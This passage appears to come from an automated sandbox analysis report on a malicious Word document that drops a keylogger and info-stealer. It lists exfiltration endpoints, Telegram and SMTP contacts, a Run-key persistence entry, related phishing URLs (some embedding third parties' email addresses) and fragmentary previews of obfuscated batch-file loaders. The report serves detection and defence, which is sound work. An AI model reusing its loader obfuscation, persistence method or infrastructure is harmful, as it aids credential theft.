00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002183A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF0F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF55000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/Dz	npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002183A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BEE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF55000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enLz	npratlsN.pif, 0000000A.00000002.3463602515.000000002B990000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	npratlsN.pif, 0000000A.00000003.2435365448.000000002CA7F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C807000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C87C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA35000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C832000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.000000002291B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022963000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A44000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022787000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000228EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D073000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D271000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D02A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CE97000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CFFF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D154000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/Lz	npratlsN.pif, 0000000A.00000002.3463602515.000000002B9C1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002196D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
166.62.27.188	amazonenviro.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
46.151.208.21	mail.irco.com.sa	Saudi Arabia	51975	NASHIRNET-ASNNASHIRNETASNSA	true
147.124.216.113	unknown	United States	1432	AC-AS-1US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590510
Start date and time:	2025-01-14 08:07:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PI ITS15235.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@20/13@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 194 Number of non-executed functions: 81
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer Override analysis time to 79953.45 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 52.111.231.25, 52.111.231.23, 52.111.231.26, 52.111.231.24, 52.168.117.170, 2.20.245.216, 2.20.245.225, 52.109.89.19, 23.200.88.61, 23.200.88.73, 88.221.110.138, 88.221.110.227, 40.126.32.133, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, onedscolprdeus13.eastus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akad
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:08:12	API Interceptor	2x Sleep call for process: brightness.exe modified
02:08:24	API Interceptor	6676823x Sleep call for process: npratlsN.pif modified
02:08:29	API Interceptor	2x Sleep call for process: Nsltarpn.PIF modified
07:08:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url
07:08:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
104.21.16.1	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	1001-13.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	trow.exe	Get hash	malicious	Unknown	Browse	www.wifi4all.nl/
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/0xli/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.irco.com.sa	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	SP0npSA64a.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	7DI4iYwcvw.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
amazonenviro.com	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
reallyfreegeoip.org	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
api.telegram.org	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturr	Get hash	malicious	Unknown	Browse	149.154.164.13
	http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylter	Get hash	malicious	Unknown	Browse	149.154.164.13
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	149.154.167.99
	sysadmin.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JUbmpeT.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://tinyurl.com/286oc4ly	Get hash	malicious	Unknown	Browse	104.17.112.233
	http://hotpepperliberia.com	Get hash	malicious	Unknown	Browse	172.67.130.110
	https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7Qw	Get hash	malicious	Unknown	Browse	104.17.113.39
	http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	172.67.74.152
	https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://mshare-54543.pages.dev/index-2tuka/	Get hash	malicious	Unknown	Browse	172.66.47.106
	https://iyztciuamr.cfolks.pl/pp	Get hash	malicious	Unknown	Browse	104.22.49.253
	http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturr	Get hash	malicious	Unknown	Browse	104.26.6.173
	http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylter	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
UTMEMUS	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
AS-26496-GO-DADDY-COM-LLCUS	trow.exe	Get hash	malicious	Unknown	Browse	107.180.98.101
	https://upholl-xlognusa.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	3.elf	Get hash	malicious	Unknown	Browse	184.168.52.170
	http://logiinnmaskemettaha93.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	http://app-metamask.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	http://metamssk-luggiinn.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	72.167.84.16
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.28.135
	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	166.62.27.188

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://imtcoken.im/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://eb-ri18.vercel.app/verset.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://metahorizonsfacebooksupport.tempisite.com/italy39	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://ubiquitous-twilight-c9292b.netlify.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://jaffeusacanna-9646.vercel.app/zqh.heups/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://realrectify.pages.dev/self/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://www.startfortjeneste.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
a0e9f5d64349fb13191bc781f81f42e1	183643586-388657435.07.exe	Get hash	malicious	Unknown	Browse	166.62.27.188
	uo9m.exe	Get hash	malicious	LummaC	Browse	166.62.27.188
	uo9m.exe	Get hash	malicious	LummaC	Browse	166.62.27.188
	YYYY-NNN AUDIT DETAIL REPORT .docx	Get hash	malicious	Unknown	Browse	166.62.27.188
	msit.exe	Get hash	malicious	LummaC Stealer	Browse	166.62.27.188
	tesr.exe	Get hash	malicious	LummaC Stealer	Browse	166.62.27.188
	WSLRT.exe	Get hash	malicious	LummaC Stealer	Browse	166.62.27.188
	msit.msi	Get hash	malicious	LummaC Stealer	Browse	166.62.27.188

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\npratlsN.pif	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8214
Entropy (8bit):	4.674238519900089
Encrypted:	false
SSDEEP:	192:xmRmcVw5I1Rsv869gx2A9gB59zox8Y2MXNlT3l:xmcIDsss3ffY2MXDJ
MD5:	7821E3DE3812E791CF3B223500D73BC9
SHA1:	5E211B634CE77E6FEE83CE8A5B8C9A37C8B81E1D
SHA-256:	3DAA7F9EEE129F61F7A452F7150EE21A1C4141586A37F37842B9C3BB53152A74
SHA-512:	6EAE270065401626DF97B73A255578BF27B4F4DEA480954843823046AD95E40CF706C1A767C8765EF3AB48EA3A18498375614317EC00A9EF29A4DD21EDBC5F26
Malicious:	false
Reputation:	low
Preview:	@echo off..set "kocp=sket "..@% . .......%e%..... ..%c% .%h%......%o%..r.o% %......%o%....o.... %f%r%f%.. .%..s%.%e%..%t%. ..% %.%"%..%X%.. %I%.......%n%.....%i%....... %=%.......%s%...%e%. .o.%t%.....% %.r..r....%"%.%..%XIni%"%... %s% ......%K%o.%x%..%H%......%=%.........o%=%. ...%"%...o..%..%XIni%"%..........%F%.r.. ... %J%.%I%.o%V%......%I%.%x%. %F%........%p%..........%s%....... .%T%r..%%sKxH%h%.o....o..%2%....r....r%s%.....%h%...o..%"% ... %..%XIni%"%. .%B%.........%m%.....%T%...o.%j%........%M%.%S%......

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
Category:	dropped
Size (bytes):	28538
Entropy (8bit):	4.650636495384082
Encrypted:	false
SSDEEP:	384:Y0iUTHG+EnI6DRfX67uezyCqIUEfDTfF3K0QNqTTwNv7lkqj3DRvCpoVsodnqgJW:YwWbDRfipu7IUkfYQ0Xkqjgww
MD5:	E24FA8FB365A89779B026772B9342AF3
SHA1:	B90DE3C9F3093CA8BADFAF6C98218B744087E8F9
SHA-256:	10D7B4EA056FC1037109FE6E6694849D145B0745FAA9AE02957104A2834A14A0
SHA-512:	A32F7A29C4C8CC831A5057B8DB31F79E7DEDB9172AC9705DA6A8DA65384ED23827C3CCCDB833562CDAB63ADDD679341707A2B46BBC8C802845CBBBBB01771D10
Malicious:	false
Preview:	@echo off..@%.. ..%e%r.%c%...r.%h%..%o%r........% %....%o%. ..%f%..........%f%....%..s%. ......%e%.... ...%t%.% %.. o..o.%"%r.r.......%x%.......%u%..o..... %u%.%y%.......%=%o..r..%s%..%e% o%t%r.......% %..o%"%..r.....%..%xuuy%"%.........%J%...%o%..r ....%Z%...%u%.......%=%.%=%..%"%..........%..%xuuy%"%....%s%.......%F%..r..o..o%o%.......%F%.... .....%G%..%l%.r... ....%F%.%k%.%a%. ...%g%ro.. %%JoZu%h%.%2% ...r.%s%..........%h% %"%... .....%..%xuuy%"%......%H%..%O%.....r..%D%.. .%B%..... ...%e%.....

C:\Users\Public\Libraries\Nsltarpn

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	data
Category:	dropped
